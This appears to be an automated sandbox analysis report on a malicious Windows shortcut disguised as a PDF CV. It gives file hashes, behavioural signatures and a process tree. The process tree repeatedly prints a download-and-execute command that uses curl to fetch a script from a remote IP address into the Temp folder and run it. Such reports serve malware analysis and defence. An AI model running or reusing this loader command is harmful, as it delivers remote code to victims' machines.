Analysis
-
max time kernel
43s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
14-09-2022 00:01
General
-
Target
lebenslauf_20220808.pdf - Copy.lnk
-
Size
2KB
-
MD5
a91dac87f3daadf839337e4e636dd1fb
-
SHA1
ca05b847c0075d302a6f38820caadf571346671e
-
SHA256
b26dc83535e484cad792e00717a8173d94121ca1369b2faf247800c1252cadd9
-
SHA512
375e29a871b6a3c71a67ae2de1f214d117f6a1ca2f397694a864c36b61533efad326be7d20db30d9f85bcb3af3f72bd0050378e61726564851317016cc64a692
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\lebenslauf_20220808.pdf - Copy.lnk"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /m * /c "cmd /c curl 185.45.192.208/re.css --output-dir "C:\Users\Admin\AppData\Local\Temp" --output "xs34.cmd"&&"C:\Users\Admin\AppData\Local\Temp\xs34.cmd"&&exit"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
C:\Windows\System32\cmd.exe/c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit3⤵
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB